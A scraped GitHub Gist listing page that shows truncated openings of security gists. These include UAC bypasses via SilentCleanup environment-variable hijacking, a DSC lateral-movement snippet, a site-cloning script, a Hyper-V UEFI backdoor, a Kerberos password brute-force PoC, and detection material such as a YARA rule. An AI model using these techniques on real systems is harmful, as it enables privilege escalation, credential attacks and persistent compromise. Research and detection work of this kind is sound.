Skip to content

Instantly share code, notes, and snippets.

Avatar

James Hovious JamesHovious

View GitHub Profile
View PowerShellDSCLateralMovement.ps1
# This idea originated from this blog post on Invoke DSC Resources directly:
# https://blogs.msdn.microsoft.com/powershell/2015/02/27/invoking-powershell-dsc-resources-directly/
<#
$MOFContents = @'
instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref
{
ResourceID = "[Script]ScriptExample";
GetScript = "\"$(Get-Date): I am being GET\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
TestScript = "\"$(Get-Date): I am being TESTED\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
@makelariss
makelariss / uacbypassEnviromentVariableExpansion.py
Last active Jun 17, 2021
Tested on Microsoft Windows [Version 10.0.16299.248]
View uacbypassEnviromentVariableExpansion.py
# -*- coding: utf-8 -*-
# All credits go to https://tyranidslair.blogspot.gr/2017/05/exploiting-environment-variables-in.html
'''
SilentCleanup has a "Highest" RunLevel meaning it will elevate the scheduled task to administrator without any prompting.
It also contains enviroment variables in the path set on "Execute" (%windir%\system32\cleanmgr.exe), the Enviroment variables are stored in the HKCU registry hive which is write accesible by a user. (HKCU\Environment)
We can perform a AlwaysNotify UAC Bypass by changing the enviroment variable's 'windir' value to our own payload and triggering it through the SilentCleanup scheduled task.
'''
from _winreg import *
HKCU = ConnectRegistry(None, HKEY_CURRENT_USER)
@Mr-Un1k0d3r
Mr-Un1k0d3r / cloning.sh
Created Nov 7, 2017
Lazy website cloning
View cloning.sh
#!/bin/bash
echo "Cloning $1"
wget $1 -O index.html &> /dev/null
TAG="<base href=\"$1\"/></head>"
sed '/<\/head>/i\'"$TAG" index.html | tee index.html &> /dev/null
echo "index.html was saved and modified"
@mattifestation
mattifestation / WDAG_CI_Policy.xml
Created Oct 18, 2017
Recovered Windows Defender Application Guard Hyper-V Container Code Integrity Policy
View WDAG_CI_Policy.xml
<?xml version="1.0"?>
<SiPolicy xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="urn:schemas-microsoft-com:sipolicy">
<VersionEx>10.0.0.0</VersionEx>
<PolicyTypeID>{A244370E-44C9-4C06-B551-F6016E563076}</PolicyTypeID>
<PlatformID>{2E07F7E4-194C-4D20-B7C9-6F44A6C5A234}</PlatformID>
<Rules>
<Rule>
<Option>Enabled:UMCI</Option>
</Rule>
<Rule>
@curi0usJack
curi0usJack / .htaccess
Last active Aug 2, 2022
FYI THIS IS NO LONGER AN .HTACCESS FILE. SEE COMMENTS BELOW. DON'T WORRY, IT'S STILL EASY.
View .htaccess
#
# TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__!
#
# Note this version requires Apache 2.4+
#
# Save this file into something like /etc/apache2/redirect.rules.
# Then in your site's apache conf file (in /etc/apache2/sites-avaiable/), put this statement somewhere near the bottom
#
# Include /etc/apache2/redirect.rules
#
@jaredcatkinson
jaredcatkinson / Get-KerberosTicketGrantingTicket.ps1
Last active Jun 9, 2022
Kerberos Ticket Granting Ticket Collection Script and Golden Ticket Detection Tests
View Get-KerberosTicketGrantingTicket.ps1
function Get-KerberosTicketGrantingTicket
{
<#
.SYNOPSIS
Gets the Kerberos Tickets Granting Tickets from all Logon Sessions
.DESCRIPTION
Get-KerberosTicketGrantingTicket uses the Local Security Authority (LSA) functions to enumerate Kerberos logon sessions and return their associate Kerberos Ticket Granting Tickets.
@williballenthin
williballenthin / stackstrings.yara
Last active Nov 1, 2021
match x86 that appears to be stack string creation
View stackstrings.yara
rule stack_strings
{
meta:
author = "William Ballenthin"
email = "william.ballenthin@fireeye.com"
license = "Apache 2.0"
copyright = "FireEye, Inc"
description = "Match x86 that appears to be stack string creation."
strings:
@Cr4sh
Cr4sh / DmaHvBackdoor.c
Last active Jul 29, 2022
Hyper-V backdoor for UEFI
View DmaHvBackdoor.c
/*
*********************************************************************
Part of UEFI DXE driver code that injects Hyper-V VM exit handler
backdoor into the Device Guard enabled Windows 10 Enterprise.
Execution starts from new_ExitBootServices() -- a hook handler
for EFI_BOOT_SERVICES.ExitBootServices() which being called by
winload!OslFwpKernelSetupPhase1(). After DXE phase exit winload.efi
transfers exeution to previously loaded Hyper-V kernel (hvix64.sys)
@ropnop
ropnop / kinit_brute.sh
Last active Jun 6, 2021
A quick tool to bruteforce an AD user's password by requesting TGTs from the Domain Controller with 'kinit'
View kinit_brute.sh
#!/bin/bash
# Title: kinit_brute.sh
# Author: @ropnop
# Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller
# The script configures the realm and KDC for you based on the domain provided and the domain controller
# Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf
# Only tested with Heimdal kerberos (error messages might be different for MIT clients)
# Note: this *will* lock out accounts if a domain lockout policy is set. Be careful
View bypass_uac.ps1
# Powershell script to bypass UAC on Vista+ assuming
# there exists one elevated process on the same desktop.
# Technical details in:
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-3.html
# You need to Install-Module NtObjectManager for this to run.
Import-Module NtObjectManager